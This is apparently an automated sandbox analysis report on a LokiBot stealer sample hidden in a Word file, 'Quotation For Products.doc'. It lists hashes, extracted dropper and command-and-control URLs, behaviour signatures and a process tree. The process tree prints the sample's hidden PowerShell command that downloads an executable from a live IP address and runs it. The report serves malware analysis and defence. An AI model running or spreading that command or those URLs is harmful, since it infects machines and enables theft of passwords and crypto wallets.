lokibot | 2c44f76d882e07be44cb97ff736b54aa2e531ec45c4ad2fa51438824665f532f

General

Target

Quotation For Products.doc
Size

416KB
MD5

3a99afd85fb1e4bda80f0a8bb2476616
SHA1

2398d29a7cd49968a3ea037821cf864579f20ce8
SHA256

2c44f76d882e07be44cb97ff736b54aa2e531ec45c4ad2fa51438824665f532f
SHA512

066b74b5a80ac126e71ec4be063f8a3aefd668bbda0f766821c660f961b71ec011c243da1eb3d5fa737e8d39bdeb81ceb190045e2777c14115f4e5cabc502022

Score

10^/10

lokibot spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://31.210.20.45/1xBet/dgeApp17.exe

Extracted

Family

lokibot

C2

http://209.141.34.39/cap-01/pin.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1968	916	powershell.exe	WINWORD.EXE

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

bornskin.exe

pid process

1988 bornskin.exe
Loads dropped DLL 1 IoCs

Processes:

bornskin.exe

pid process

1568 bornskin.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

bornskin.exe

description pid process target process

PID 1568 set thread context of 1988 1568 bornskin.exe bornskin.exe
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

pid	process
1988	bornskin.exe

pid	process
1568	bornskin.exe

description	pid	process	target process
PID 1568 set thread context of 1988	1568	bornskin.exe	bornskin.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

916 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exebornskin.exe

pid process

1968 powershell.exe
1568 bornskin.exe
1568 bornskin.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exebornskin.exebornskin.exe

description pid process

Token: SeDebugPrivilege 1968 powershell.exe
Token: SeDebugPrivilege 1568 bornskin.exe
Token: SeDebugPrivilege 1988 bornskin.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

916 WINWORD.EXE
916 WINWORD.EXE

pid	process
916	WINWORD.EXE

pid	process
1968	powershell.exe
1568	bornskin.exe
1568	bornskin.exe

description	pid	process
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1568	bornskin.exe
Token: SeDebugPrivilege	1988	bornskin.exe

pid	process
916	WINWORD.EXE
916	WINWORD.EXE

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

WINWORD.EXEpowershell.exebornskin.exe

description	pid	process	target process
PID 916 wrote to memory of 1968	916	WINWORD.EXE	powershell.exe
PID 916 wrote to memory of 1968	916	WINWORD.EXE	powershell.exe
PID 916 wrote to memory of 1968	916	WINWORD.EXE	powershell.exe
PID 916 wrote to memory of 1968	916	WINWORD.EXE	powershell.exe
PID 1968 wrote to memory of 1568	1968	powershell.exe	bornskin.exe
PID 1968 wrote to memory of 1568	1968	powershell.exe	bornskin.exe
PID 1968 wrote to memory of 1568	1968	powershell.exe	bornskin.exe
PID 1968 wrote to memory of 1568	1968	powershell.exe	bornskin.exe
PID 916 wrote to memory of 1332	916	WINWORD.EXE	splwow64.exe
PID 916 wrote to memory of 1332	916	WINWORD.EXE	splwow64.exe
PID 916 wrote to memory of 1332	916	WINWORD.EXE	splwow64.exe
PID 916 wrote to memory of 1332	916	WINWORD.EXE	splwow64.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe
PID 1568 wrote to memory of 1988	1568	bornskin.exe	bornskin.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Quotation For Products.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/dgeApp17.exe" -Destination "C:\Users\Public\Documents\bornskin.exe";C:\Users\Public\Documents\bornskin.exe
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968

C:\Users\Public\Documents\bornskin.exe
"C:\Users\Public\Documents\bornskin.exe"
3⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1568

C:\Users\Admin\AppData\Local\Temp\bornskin.exe
C:\Users\Admin\AppData\Local\Temp\bornskin.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1332

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bornskin.exe
MD5
81f63c8e0fab4d42de5486e88aa5ac74

SHA1
f3b3d2fb57e01af4bbcc356a71e8a5abe428491c

SHA256
2c4029189010085712385bb7329bf0a10851ddec9c9849e60a94962896fcdfe4

SHA512
ef293f7d8b32d3cd2edcbc0620dbf17aadf7f85465e8e864aa15118b9c9255240c9ea2d5215709408a6062c1ead868b71cd8749f12be6f4ddc24c7e1ff20c0bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\bornskin.exe
MD5
81f63c8e0fab4d42de5486e88aa5ac74

SHA1
f3b3d2fb57e01af4bbcc356a71e8a5abe428491c

SHA256
2c4029189010085712385bb7329bf0a10851ddec9c9849e60a94962896fcdfe4

SHA512
ef293f7d8b32d3cd2edcbc0620dbf17aadf7f85465e8e864aa15118b9c9255240c9ea2d5215709408a6062c1ead868b71cd8749f12be6f4ddc24c7e1ff20c0bb

Download Submit
\Users\Admin\AppData\Local\Temp\bornskin.exe
MD5
81f63c8e0fab4d42de5486e88aa5ac74

SHA1
f3b3d2fb57e01af4bbcc356a71e8a5abe428491c

SHA256
2c4029189010085712385bb7329bf0a10851ddec9c9849e60a94962896fcdfe4

SHA512
ef293f7d8b32d3cd2edcbc0620dbf17aadf7f85465e8e864aa15118b9c9255240c9ea2d5215709408a6062c1ead868b71cd8749f12be6f4ddc24c7e1ff20c0bb

Download Submit
memory/916-60-0x0000000072661000-0x0000000072664000-memory.dmp

Filesize
12KB

Download
memory/916-61-0x00000000700E1000-0x00000000700E3000-memory.dmp

Filesize
8KB

Download
memory/916-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1332-95-0x0000000000000000-mapping.dmp

Download
memory/1332-96-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp

Filesize
8KB

Download
memory/1568-97-0x0000000002090000-0x00000000020C3000-memory.dmp

Filesize
204KB

Download
memory/1568-90-0x0000000000000000-mapping.dmp

Download
memory/1568-94-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/1568-93-0x0000000000360000-0x0000000000390000-memory.dmp

Filesize
192KB

Download
memory/1568-91-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/1968-67-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/1968-69-0x0000000000CD2000-0x0000000000CD3000-memory.dmp

Filesize
4KB

Download
memory/1968-87-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/1968-89-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1968-79-0x0000000006400000-0x0000000006401000-memory.dmp

Filesize
4KB

Download
memory/1968-78-0x00000000061D0000-0x00000000061D1000-memory.dmp

Filesize
4KB

Download
memory/1968-73-0x0000000006190000-0x0000000006191000-memory.dmp

Filesize
4KB

Download
memory/1968-70-0x0000000005250000-0x0000000005251000-memory.dmp

Filesize
4KB

Download
memory/1968-68-0x0000000000CD0000-0x0000000000CD1000-memory.dmp

Filesize
4KB

Download
memory/1968-86-0x0000000006330000-0x0000000006331000-memory.dmp

Filesize
4KB

Download
memory/1968-66-0x00000000047E0000-0x00000000047E1000-memory.dmp

Filesize
4KB

Download
memory/1968-65-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

Filesize
4KB

Download
memory/1968-63-0x0000000000000000-mapping.dmp

Download
memory/1968-64-0x0000000075011000-0x0000000075013000-memory.dmp

Filesize
8KB

Download
memory/1988-100-0x00000000004139DE-mapping.dmp

Download
memory/1988-103-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1988-99-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads